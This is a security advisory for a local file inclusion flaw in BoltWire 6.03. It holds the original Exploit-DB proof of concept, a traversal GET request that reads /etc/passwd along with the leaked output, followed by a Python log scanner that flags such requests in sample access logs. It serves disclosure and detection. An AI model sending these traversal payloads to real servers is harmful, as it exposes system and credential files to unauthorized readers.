Vendor: BoltWire
By: Andrey Stoykov
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 98
Product Name: BoltWire
Affected Version From: 6.03
Affected Version To: 6.03
Patch Exists: NO
Related CWE: N/A
CPE: a:boltwire:boltwire:6.03
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 20.04 LAMP
2020

BoltWire 6.03 – Local File Inclusion

BoltWire 6.03 is vulnerable to Local File Inclusion (LFI). An authenticated user can send a specially crafted HTTP GET request to the vulnerable page, which allows the attacker to read arbitrary files from the server. This can be exploited to gain access to sensitive information such as the /etc/passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Exploit-DB raw data:

# Exploit Title: BoltWire 6.03 - Local File Inclusion
# Date: 2020-05-02
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.boltwire.com/
# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
# Version: 6.03
# Tested on: Ubuntu 20.04 LAMP


LFI:

Steps to Reproduce:

1) Using an HTTP GET request, browse to the following page while authenticated as a user.
http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd

Result

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
[SNIPPED]
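
A defensive check for the request shown in step 1, as an added example that is not part of the original advisory or of BoltWire's code: it scans web access logs for `action` values that resolve to a path instead of an action name. The log lines are constructed sample data, and treating any `..` segment or absolute path in `action` as suspicious is an assumption about what legitimate action names look like.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (common log format). Only the first request
# path comes from the advisory; everything else is sample data.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2020:10:00:01 +0000] "GET /boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd HTTP/1.1" 200 1874',
    '203.0.113.7 - - [02/May/2020:10:00:09 +0000] "GET /boltwire/index.php?p=action.search&action=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1874',
    '198.51.100.20 - - [02/May/2020:10:01:30 +0000] "GET /boltwire/index.php?p=action.search&action=search HTTP/1.1" 200 5120',
    '198.51.100.20 - - [02/May/2020:10:01:42 +0000] "GET /boltwire/index.php?p=main HTTP/1.1" 200 4301',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def normalize(value, max_rounds=3):
    """Percent-decode until stable so nested encoding cannot hide a path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")  # treat backslashes as separators too


def suspicious_action(value):
    """True if an `action` value looks like a file path (assumed heuristic)."""
    v = normalize(value)
    return ".." in v.split("/") or v.startswith("/") or "\x00" in v


def scan(lines):
    """Return (client_ip, decoded action value) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get("action", []):
            if suspicious_action(value):
                hits.append((line.split()[0], normalize(value)))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"traversal in action parameter from {ip}: {value}")
```

A hit with a 200 status and a response size that differs from normal search responses is worth correlating with the authenticated session that issued it.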